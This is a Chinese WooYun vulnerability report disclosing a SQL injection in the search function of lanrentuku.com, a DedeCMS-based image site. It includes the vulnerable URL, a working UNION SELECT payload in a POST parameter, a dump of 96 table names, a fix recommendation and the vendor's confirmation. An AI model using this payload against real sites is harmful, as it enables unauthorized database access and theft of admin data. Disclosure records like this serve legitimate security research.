漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-046704
漏洞标题:懒人图库使用dedecms二次开发存在sql注入爆库
相关厂商:www.lanrentuku.com
漏洞作者: 木惘然
提交时间:2014-05-20 18:41
修复时间:2014-07-04 18:42
公开时间:2014-07-04 18:42
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-05-20: 细节已通知厂商并且等待厂商处理中
2014-05-20: 厂商已经确认,细节仅向厂商公开
2014-05-30: 细节向核心白帽子及相关领域专家公开
2014-06-09: 细节向普通白帽子公开
2014-06-19: 细节向实习白帽子公开
2014-07-04: 细节向公众公开
简要描述:
二次开发对post参数过滤不足
乌云哥抱歉了,上次忘写注入点了。
详细说明:
注入点http://www.lanrentuku.com/js/search/q=
POST数据keyword=-1' OR 3 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0
x71636c7371,0x4857487276544c484b68,0x71676d7971)#21=6 AND 00010=00010 --
漏洞证明:
数据库版本号 服务器版本号 库
用户
爆懒人库表
Database: lanrentuku
[96 tables]
+-----------------------+
| admin |
| dede_addonarticle |
| dede_addonimages |
| dede_addoninfos |
| dede_addonpsd |
| dede_addonshop |
| dede_addonsoft |
| dede_addonspec |
| dede_addonvector |
| dede_admin |
| dede_admintype |
| dede_advancedsearch |
| dede_arcatt |
| dede_arccache |
| dede_archives |
| dede_arcrank |
| dede_arctiny |
| dede_arctype |
| dede_area |
| dede_channeltype |
| dede_co_htmls |
| dede_co_mediaurls |
| dede_co_note |
| dede_co_onepage |
| dede_co_urls |
| dede_diyforms |
| dede_downloads |
| dede_erradd |
| dede_feedback |
| dede_flink |
| dede_flinktype |
| dede_freelist |
| dede_guestbook |
| dede_homepageset |
| dede_keywords |
| dede_log |
| dede_member |
| dede_member_company |
| dede_member_flink |
| dede_member_friends |
| dede_member_guestbook |
| dede_member_operation |
| dede_member_person |
| dede_member_pms |
| dede_member_snsmsg |
| dede_member_space |
| dede_member_stow |
| dede_member_tj |
| dede_member_type |
| dede_member_vhistory |
| dede_moneycard_record |
| dede_moneycard_type |
| dede_mtypes |
| dede_myad |
| dede_myadtype |
| dede_mytag |
| dede_plus |
| dede_psd |
| dede_purview |
| dede_pwd_tmp |
| dede_qq |
| dede_ratings |
| dede_scores |
| dede_search_cache |
| dede_search_keywords |
| dede_sgpage |
| dede_shops_delivery |
| dede_shops_orders |
| dede_shops_paytype |
| dede_shops_products |
| dede_shops_userinfo |
| dede_show |
| dede_softconfig |
| dede_software |
| dede_sphinx |
| dede_stepselect |
| dede_sys_enum |
| dede_sys_module |
| dede_sys_set |
| dede_sys_task |
| dede_sysconfig |
| dede_tagindex |
| dede_taglist |
| dede_tupian |
| dede_uploads |
| dede_verifies |
| dede_vote |
| dede_vote_member |
| dede_wallpaper |
| duoshuo_commentmeta |
| js |
| js_cate |
| mail |
| png |
| png_search |
| png_tag |
+-----------------------+
dede_admin表数据
修复方案:
过滤post提交参数
版权声明:转载请注明来源 木惘然@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:20
确认时间:2014-05-20 21:26
厂商回复:
网站确实存在漏洞,我们愿意付费请作者帮助修复漏洞。
最新状态:
暂无